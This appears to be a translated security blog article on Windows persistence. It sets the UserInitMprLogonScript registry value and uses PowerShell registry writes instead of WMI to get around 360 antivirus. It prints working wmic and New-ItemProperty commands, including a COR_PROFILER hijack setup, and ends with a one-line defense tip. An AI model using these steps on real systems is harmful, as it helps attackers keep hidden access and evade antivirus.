0x00 Introduction

---

This article continues the series on backdoor exploitation methods, focusing on the use of Logon Scripts. During my research, I discovered a particular technique where scripts execute before antivirus software, allowing them to bypass antivirus interception of sensitive operations. This article will detail this technique.

Note:

Some antivirus software can start before Logon Scripts.

0x01 Overview

---

  • Usage of Logon Scripts
  • Bypassing 360's interception of WMI calls
  • Special Techniques

0x02 Usage of Logon Scripts

---

The idea originates from Adam@Hexacorn, with the following address:

http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/

Brief introduction to the usage of Logon Scripts

Registry path: HKCU\Environment\

Create string key value: UserInitMprLogonScript

Set key value to absolute path of bat: c:\test\11.bat

As shown in the figure below

Alt text

The content of the bat is as follows:

start calc.exe

Log off, log on

Execute script 11.bat, calculator pops up

0x03 Bypass 360's interception of modifying environment variables via WMI

---

As mentioned in the previous article 'Use CLR to maintain persistence', the method of using wmic to modify environment variables

The command is as follows:

wmic ENVIRONMENT create name="COR_ENABLE_PROFILING",username="%username%",VariableValue="1"

wmic ENVIRONMENT create name="COR_PROFILER",username="%username%",VariableValue="{11111111-1111-1111-1111-111111111111}"

However, 360 will intercept WMI operations, as shown in the figure below

Alt text

In fact, adding environment variables via WMI is equivalent to creating key-values in the registry HKCR\Environment\

Therefore, WMI operations can be replaced by writing to the registry

The above WMI command can be replaced with the following PowerShell code:

New-ItemProperty "HKCU:\Environment\" COR_ENABLE_PROFILING -value "1" -propertyType string | Out-Null

New-ItemProperty "HKCU:\Environment\" COR_PROFILER -value "{11111111-1111-1111-1111-111111111111}" -propertyType string | Out-Null

0x04 Special Usage

---

Originating from a unique idea of mine

During my research on this technique, I had an interesting thought: Do Logon Scripts start before other programs?

If so, do they also start before antivirus software?

Now, let's begin my test:

1. Enter the following code in cmd:

wmic ENVIRONMENT create name="test",username="%username%",VariableValue="I run faster!"

As expected, it was blocked

2. Setting Logon Scripts

The code for 11.bat is as follows:

wmic ENVIRONMENT create name="test",username="%username%",VariableValue="I run faster!"
reg query HKEY_CURRENT_USER\Environment /V test
pause

3. Enabling Logon Scripts

Registry path: HKCR\Environment\

Create a string key value: UserInitMprLogonScript

Set the key value to the absolute path of the bat file: c:\test\11.bat

Since calling WMI will be blocked, it can be implemented via PowerShell with the following code:

New-ItemProperty "HKCU:\Environment\" UserInitMprLogonScript -value "c:\test\11.bat" -propertyType string | Out-Null

4. Log off, log back in, and test

If the registry HKCR\Environment\ is successfully written with the key value test REG_SZ I run faster!, it indicates that Logon Scripts execute before antivirus software, bypassing its restrictions

The complete operation is shown in the figure below

Alt text

Test successful, verifying our conclusion

0x05 Defense

---

Monitor registry key HKCR\Environment\UserInitMprLogonScript

0x06 Summary

---

This article tests the usage of Logon Scripts and introduces a special application: Logon Scripts can execute before antivirus software, bypassing its interception of sensitive operations.

From a defensive perspective, vigilance should be maintained against this.